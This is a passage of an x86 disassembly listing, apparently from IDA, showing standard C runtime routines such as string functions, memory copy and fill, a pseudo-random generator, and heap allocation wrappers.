pop eax
jmp short loc_410506
; ---------------------------------------------------------------------------
loc_4104A6: ; CODE XREF: sub_41043E+4D�j
; sub_41043E+5B�j ...
push eax
push dword ptr [esi]
call sub_410310
pop ecx
test eax, eax
pop ecx
jnz short loc_4104F0
loc_4104B4: ; CODE XREF: sub_41043E+B0�j
inc dword ptr [edi]
mov eax, [edi]
loc_4104B8: ; CODE XREF: sub_41043E+90�j
mov ecx, [esi]
mov dl, [eax]
mov cl, [ecx]
cmp cl, dl
jz short loc_4104D0
cmp cl, 5Bh
jz short loc_4104D0
cmp dl, bl
jz short loc_4104D0
inc eax
mov [edi], eax
jmp short loc_4104B8
; ---------------------------------------------------------------------------
loc_4104D0: ; CODE XREF: sub_41043E+82�j
; sub_41043E+87�j ...
mov eax, [edi]
cmp [eax], bl
jz short loc_4104E7
push eax
push dword ptr [esi]
call sub_410310
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_4104EC
; ---------------------------------------------------------------------------
loc_4104E7: ; CODE XREF: sub_41043E+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_4104EC: ; CODE XREF: sub_41043E+A7�j
cmp eax, ebx
jnz short loc_4104B4
loc_4104F0: ; CODE XREF: sub_41043E+74�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_410503
mov eax, [esi]
cmp [eax], bl
jnz short loc_410503
mov [ebp+var_4], 1
loc_410503: ; CODE XREF: sub_41043E+B6�j
; sub_41043E+BC�j
mov eax, [ebp+var_4]
loc_410506: ; CODE XREF: sub_41043E+57�j
; sub_41043E+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_41043E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41050B proc near ; CODE XREF: start+61�p
; seg000:00401496�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
mov [ebp+var_14], 42h
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
mov [ebp+var_1C], 7FFFFFFFh
push eax
call sub_412C3C
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_41054B
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_410558
; ---------------------------------------------------------------------------
loc_41054B: ; CODE XREF: sub_41050B+36�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_412B27
pop ecx
pop ecx
loc_410558: ; CODE XREF: sub_41050B+3E�j
mov eax, esi
pop esi
leave
retn
sub_41050B endp
; =============== S U B R O U T I N E =======================================
sub_41055D proc near ; CODE XREF: start+2E�p
; seg000:00401C1C�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_42E148, eax
retn
sub_41055D endp
; =============== S U B R O U T I N E =======================================
sub_410567 proc near ; CODE XREF: seg000:0040117D�p
; seg000:004011F1�p ...
mov eax, ds:dword_42E148
imul eax, 343FDh
add eax, 269EC3h
mov ds:dword_42E148, eax
sar eax, 10h
and eax, 7FFFh
retn
sub_410567 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410590 proc near ; CODE XREF: seg000:0040194F�p
; seg000:00401AC7�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_4105E3
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_4105D7
neg ecx
and ecx, 3
jz short loc_4105B9
sub edx, ecx
loc_4105B3: ; CODE XREF: sub_410590+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_4105B3
loc_4105B9: ; CODE XREF: sub_410590+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_4105D7
rep stosd
test edx, edx
jz short loc_4105DD
loc_4105D7: ; CODE XREF: sub_410590+18�j
; sub_410590+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_4105D7
loc_4105DD: ; CODE XREF: sub_410590+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4105E3: ; CODE XREF: sub_410590+A�j
mov eax, [esp+arg_0]
retn
sub_410590 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105F0 proc near ; CODE XREF: seg000:00401A73�p
; seg000:00401A84�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_410610
cmp edi, eax
jb loc_410788
loc_410610: ; CODE XREF: sub_4105F0+16�j
test edi, 3
jnz short loc_41062C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41064C
rep movsd
jmp ds:off_410738[edx*4]
; ---------------------------------------------------------------------------
loc_41062C: ; CODE XREF: sub_4105F0+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_410644
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_41064C+4[eax*4]
; ---------------------------------------------------------------------------
loc_410644: ; CODE XREF: sub_4105F0+46�j
jmp dword ptr ds:loc_410748[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41064C: ; CODE XREF: sub_4105F0+31�j
; sub_4105F0+8E�j ...
jmp ds:off_4106CC[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_410660
dd offset loc_41068C
dd offset loc_4106B0
; ---------------------------------------------------------------------------
loc_410660: ; DATA XREF: sub_4105F0+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41064C
rep movsd
jmp ds:off_410738[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41068C: ; DATA XREF: sub_4105F0+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41064C
rep movsd
jmp ds:off_410738[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_4106B0: ; DATA XREF: sub_4105F0+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_41064C
rep movsd
jmp ds:off_410738[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4106CC dd offset loc_41072F ; DATA XREF: sub_4105F0:loc_41064C�r
dd offset loc_41071C
dd offset loc_410714
dd offset loc_41070C
dd offset loc_410704
dd offset loc_4106FC
dd offset loc_4106F4
dd offset loc_4106EC
; ---------------------------------------------------------------------------
loc_4106EC: ; CODE XREF: sub_4105F0:loc_41064C�j
; DATA XREF: sub_4105F0+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_4106F4: ; CODE XREF: sub_4105F0:loc_41064C�j
; DATA XREF: sub_4105F0+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_4106FC: ; CODE XREF: sub_4105F0:loc_41064C�j
; DATA XREF: sub_4105F0+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_410704: ; CODE XREF: sub_4105F0:loc_41064C�j
; DATA XREF: sub_4105F0+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_41070C: ; CODE XREF: sub_4105F0:loc_41064C�j
; DATA XREF: sub_4105F0+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_410714: ; CODE XREF: sub_4105F0:loc_41064C�j
; DATA XREF: sub_4105F0+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_41071C: ; CODE XREF: sub_4105F0:loc_41064C�j
; DATA XREF: sub_4105F0+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41072F: ; CODE XREF: sub_4105F0:loc_41064C�j
; DATA XREF: sub_4105F0:off_4106CC�o
jmp ds:off_410738[edx*4]
; ---------------------------------------------------------------------------
align 4
off_410738 dd offset loc_410748 ; DATA XREF: sub_4105F0+35�r
; sub_4105F0+92�r ...
dd offset loc_410750
dd offset loc_41075C
dd offset loc_410770
; ---------------------------------------------------------------------------
loc_410748: ; CODE XREF: sub_4105F0+35�j
; sub_4105F0+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_410750: ; CODE XREF: sub_4105F0+35�j
; sub_4105F0+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41075C: ; CODE XREF: sub_4105F0+35�j
; sub_4105F0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_410770: ; CODE XREF: sub_4105F0+35�j
; sub_4105F0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_410788: ; CODE XREF: sub_4105F0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_4107BC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4107B0
std
rep movsd
cld
jmp ds:off_4108D0[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_4107B0: ; CODE XREF: sub_4105F0+1B1�j
; sub_4105F0+208�j ...
neg ecx
jmp dword ptr ds:loc_41087F+1[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4107BC: ; CODE XREF: sub_4105F0+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_4107D4
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_4107D4+4[eax*4]
; ---------------------------------------------------------------------------
loc_4107D4: ; CODE XREF: sub_4105F0+1D6�j
; DATA XREF: sub_4105F0+1DD�r
jmp ds:off_4108D0[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4107E8
; ---------------------------------------------------------------------------
or [eax], cl
inc ecx
add [eax], dh
or [ecx+0], al
loc_4107E8: ; DATA XREF: sub_4105F0+1EC�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_4107B0
std
rep movsd
cld
jmp ds:off_4108D0[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_4107B0
std
rep movsd
cld
jmp ds:off_4108D0[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_4107B0
std
rep movsd
cld
jmp ds:off_4108D0[edx*4]
; ---------------------------------------------------------------------------
align 4
test [eax], cl
inc ecx
add [eax+ecx+8940041h], cl
inc ecx
add [eax+ecx+8A40041h], bl
inc ecx
add [eax+ecx+8B40041h], ch
inc ecx
loc_41087F: ; DATA XREF: sub_4105F0+1C2�r
add bh, al
or [ecx+0], al
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4108C7: ; CODE XREF: sub_4105F0+1C2�j
jmp ds:off_4108D0[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_4108D0 dd offset loc_4108E0 ; DATA XREF: sub_4105F0+1B7�r
; sub_4105F0:loc_4107D4�r ...
dd offset loc_4108E8
dd offset loc_4108F8
dd offset loc_41090C
; ---------------------------------------------------------------------------
loc_4108E0: ; CODE XREF: sub_4105F0+1B7�j
; sub_4105F0:loc_4107D4�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4108E8: ; CODE XREF: sub_4105F0+1B7�j
; sub_4105F0:loc_4107D4�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4108F8: ; CODE XREF: sub_4105F0+1B7�j
; sub_4105F0:loc_4107D4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41090C: ; CODE XREF: sub_4105F0+1B7�j
; sub_4105F0:loc_4107D4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_4105F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410930 proc near ; CODE XREF: seg000:004011AE�p
; seg000:004011CA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_41097C
loc_410940: ; CODE XREF: sub_410930+3C�j
; sub_410930+66�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_410974
or al, al
jz short loc_410970
cmp ah, [ecx+1]
jnz short loc_410974
or ah, ah
jz short loc_410970
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_410974
or al, al
jz short loc_410970
cmp ah, [ecx+3]
jnz short loc_410974
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_410940
mov edi, edi
loc_410970: ; CODE XREF: sub_410930+18�j
; sub_410930+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_410974: ; CODE XREF: sub_410930+14�j
; sub_410930+1D�j ...
sbb eax, eax
shl eax, 1
inc eax
retn
; ---------------------------------------------------------------------------
align 4
loc_41097C: ; CODE XREF: sub_410930+E�j
test edx, 1
jz short loc_410998
mov al, [edx]
inc edx
cmp al, [ecx]
jnz short loc_410974
inc ecx
or al, al
jz short loc_410970
test edx, 2
jz short loc_410940
loc_410998: ; CODE XREF: sub_410930+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_410974
or al, al
jz short loc_410970
cmp ah, [ecx+1]
jnz short loc_410974
or ah, ah
jz short loc_410970
add ecx, 2
jmp short loc_410940
sub_410930 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4109C0 proc near ; CODE XREF: seg000:004019E5�p
; sub_41578D+7F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_4109D9
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_4109D9: ; CODE XREF: sub_4109C0+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_4109C0 endp
; =============== S U B R O U T I N E =======================================
sub_4109F4 proc near ; CODE XREF: sub_410A7F+4�p
; seg000:00418D24�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
loc_4109FC: ; CODE XREF: sub_4109F4+34�j
cmp ds:dword_42E39C, 1
jle short loc_410A14
movzx eax, byte ptr [edi]
push 8
push eax
call sub_413446
pop ecx
pop ecx
jmp short loc_410A23
; ---------------------------------------------------------------------------
loc_410A14: ; CODE XREF: sub_4109F4+F�j
movzx eax, byte ptr [edi]
mov ecx, ds:dword_42E190
mov al, [ecx+eax*2]
and eax, 8
loc_410A23: ; CODE XREF: sub_4109F4+1E�j
test eax, eax
jz short loc_410A2A
inc edi
jmp short loc_4109FC
; ---------------------------------------------------------------------------
loc_410A2A: ; CODE XREF: sub_4109F4+31�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov ebp, esi
jz short loc_410A3A
cmp esi, 2Bh
jnz short loc_410A3E
loc_410A3A: ; CODE XREF: sub_4109F4+3F�j
movzx esi, byte ptr [edi]
inc edi
loc_410A3E: ; CODE XREF: sub_4109F4+44�j
xor ebx, ebx
loc_410A40: ; CODE XREF: sub_4109F4+7B�j
cmp ds:dword_42E39C, 1
jle short loc_410A55
push 4
push esi
call sub_413446
pop ecx
pop ecx
jmp short loc_410A60
; ---------------------------------------------------------------------------
loc_410A55: ; CODE XREF: sub_4109F4+53�j
mov eax, ds:dword_42E190
mov al, [eax+esi*2]
and eax, 4
loc_410A60: ; CODE XREF: sub_4109F4+5F�j
test eax, eax
jz short loc_410A71
lea eax, [ebx+ebx*4]
lea ebx, [esi+eax*2-30h]
movzx esi, byte ptr [edi]
inc edi
jmp short loc_410A40
; ---------------------------------------------------------------------------
loc_410A71: ; CODE XREF: sub_4109F4+6E�j
cmp ebp, 2Dh
mov eax, ebx
jnz short loc_410A7A
neg eax
loc_410A7A: ; CODE XREF: sub_4109F4+82�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_4109F4 endp
; =============== S U B R O U T I N E =======================================
sub_410A7F proc near ; CODE XREF: sub_4013E9+12�p
; sub_4013E9+1D�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_4109F4
pop ecx
retn
sub_410A7F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410A8A proc near ; CODE XREF: seg000:00402036�p
; sub_402AD2+69�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_14], 42h
mov [ebp+var_1C], eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_8]
push eax
call sub_412C3C
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_410AC9
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_410AD6
; ---------------------------------------------------------------------------
loc_410AC9: ; CODE XREF: sub_410A8A+35�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_412B27
pop ecx
pop ecx
loc_410AD6: ; CODE XREF: sub_410A8A+3D�j
mov eax, esi
pop esi
leave
retn
sub_410A8A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410AE0 proc near ; CODE XREF: seg000:00401EAE�p
; seg000:00401ECE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_410B5A
mov dh, [ecx+1]
test dh, dh
jz short loc_410B47
loc_410AF8: ; CODE XREF: sub_410AE0+52�j
; sub_410AE0+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_410B1A
test al, al
jz short loc_410B14
loc_410B09: ; CODE XREF: sub_410AE0+32�j
mov al, [esi]
inc esi
loc_410B0C: ; CODE XREF: sub_410AE0+3F�j
cmp al, dl
jz short loc_410B1A
test al, al
jnz short loc_410B09
loc_410B14: ; CODE XREF: sub_410AE0+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_410B1A: ; CODE XREF: sub_410AE0+23�j
; sub_410AE0+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_410B0C
lea edi, [esi-1]
loc_410B24: ; CODE XREF: sub_410AE0+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_410B53
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_410AF8
mov al, [ecx+3]
test al, al
jz short loc_410B53
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_410B24
jmp short loc_410AF8
; ---------------------------------------------------------------------------
loc_410B47: ; CODE XREF: sub_410AE0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_412766
; ---------------------------------------------------------------------------
loc_410B53: ; CODE XREF: sub_410AE0+49�j
; sub_410AE0+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_410B5A: ; CODE XREF: sub_410AE0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_410AE0 endp
; =============== S U B R O U T I N E =======================================
sub_410B60 proc near ; CODE XREF: sub_402306+7�p
; sub_402930+124�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_410B80
loc_410B6C: ; CODE XREF: sub_410B60+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_410BB3
test ecx, 3
jnz short loc_410B6C
add eax, 0
loc_410B80: ; CODE XREF: sub_410B60+A�j
; sub_410B60+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_410B80
mov eax, [ecx-4]
test al, al
jz short loc_410BD1
test ah, ah
jz short loc_410BC7
test eax, 0FF0000h
jz short loc_410BBD
test eax, 0FF000000h
jz short loc_410BB3
jmp short loc_410B80
; ---------------------------------------------------------------------------
loc_410BB3: ; CODE XREF: sub_410B60+11�j
; sub_410B60+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_410BBD: ; CODE XREF: sub_410B60+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_410BC7: ; CODE XREF: sub_410B60+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_410BD1: ; CODE XREF: sub_410B60+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_410B60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410BE0 proc near ; CODE XREF: sub_4038A7+8�p
; seg000:00403D0A�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_410C00
loc_410BEC: ; CODE XREF: sub_410BE0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_410BEC
loc_410C00: ; CODE XREF: sub_410BE0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_410BE0 endp
; =============== S U B R O U T I N E =======================================
sub_410C0F proc near ; CODE XREF: sub_402124+A�p
; sub_40215E+12�p ...
arg_0 = dword ptr 4
push ds:dword_45F89C
push [esp+4+arg_0]
call sub_410C21
pop ecx
pop ecx
retn
sub_410C0F endp
; =============== S U B R O U T I N E =======================================
sub_410C21 proc near ; CODE XREF: sub_410C0F+A�p
; sub_411605+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_410C4A
loc_410C28: ; CODE XREF: sub_410C21+27�j
push [esp+arg_0]
call sub_410C4D
test eax, eax
pop ecx
jnz short locret_410C4C
cmp [esp+arg_4], eax
jz short locret_410C4C
push [esp+arg_0]
call sub_4134BB
test eax, eax
pop ecx
jnz short loc_410C28
loc_410C4A: ; CODE XREF: sub_410C21+5�j
xor eax, eax
locret_410C4C: ; CODE XREF: sub_410C21+13�j
; sub_410C21+19�j
retn
sub_410C21 endp
; =============== S U B R O U T I N E =======================================
sub_410C4D proc near ; CODE XREF: sub_410C21+B�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
cmp esi, ds:dword_42E3AC
ja short loc_410C65
push esi
call sub_4138A6
test eax, eax
pop ecx
jnz short loc_410C81
loc_410C65: ; CODE XREF: sub_410C4D+B�j
test esi, esi
jnz short loc_410C6C
push 1
pop esi
loc_410C6C: ; CODE XREF: sub_410C4D+1A�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push ds:dword_460EA0
call ds:dword_41C134 ; RtlAllocateHeap
loc_410C81: ; CODE XREF: sub_410C4D+16�j
pop esi
retn
sub_410C4D endp
; =============== S U B R O U T I N E =======================================
sub_410C83 proc near ; CODE XREF: sub_4021B3+A�p
; sub_4021CC+7B�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_410CB0
push esi
call sub_413550
pop ecx
test eax, eax
push esi
jz short loc_410CA2
push eax
call sub_41357B
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_410CA2: ; CODE XREF: sub_410C83+13�j
push 0
push ds:dword_460EA0
call ds:dword_41C138 ; RtlFreeHeap
loc_410CB0: ; CODE XREF: sub_410C83+7�j
pop esi
retn
sub_410C83 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_410CB2(double)
sub_410CB2 proc near ; CODE XREF: sub_4028E4+38�p
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push ds:dword_42E150
call sub_414879
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_410D38
call sub_414741
pop ecx
test eax, eax
pop ecx
jle short loc_410D1B
cmp eax, 2
jle short loc_410D0D
cmp eax, 3
jnz short loc_410D1B
fld [ebp+arg_0]
push ebx
push ecx ; int
push ecx
fstp qword ptr [esp]
push 0Bh ; double
call sub_414051
add esp, 10h
jmp short loc_410D7D
; ---------------------------------------------------------------------------
loc_410D0D: ; CODE XREF: sub_410CB2+3F�j
push esi
push ebx
call sub_414879
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_410D7D
; ---------------------------------------------------------------------------
loc_410D1B: ; CODE XREF: sub_410CB2+3A�j
; sub_410CB2+44�j
fld [ebp+arg_0]
fadd ds:dbl_41C650
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Bh
push 8
jmp short loc_410D75
; ---------------------------------------------------------------------------
loc_410D38: ; CODE XREF: sub_410CB2+2F�j
call sub_414706
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_410D5B
loc_410D4D: ; CODE XREF: sub_410CB2+AC�j
push esi
push ebx
call sub_414879
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_410D7D
; ---------------------------------------------------------------------------
loc_410D5B: ; CODE XREF: sub_410CB2+99�j
test bl, 20h
jnz short loc_410D4D
fld [ebp+var_8]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
push 0Bh ; int
push 10h ; int
loc_410D75: ; CODE XREF: sub_410CB2+84�j
call sub_4140A4
add esp, 1Ch
loc_410D7D: ; CODE XREF: sub_410CB2+59�j
; sub_410CB2+67�j ...
pop esi
pop ebx
leave
retn
sub_410CB2 endp
; ---------------------------------------------------------------------------
call sub_410D99
call sub_414942
mov ds:dword_45F824, eax
call sub_4148F2
fnclex
retn
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_410D99 proc near ; CODE XREF: seg000:00410D81�p
mov eax, offset sub_414D30
mov ds:dword_42E4CC, offset loc_4149C5
mov ds:dword_42E4C8, eax
mov ds:dword_42E4D0, offset sub_414A2B
mov ds:dword_42E4D4, offset sub_41496B
mov ds:dword_42E4D8, offset loc_414A13
mov ds:dword_42E4DC, eax
retn
sub_410D99 endp
; ---------------------------------------------------------------------------
align 4
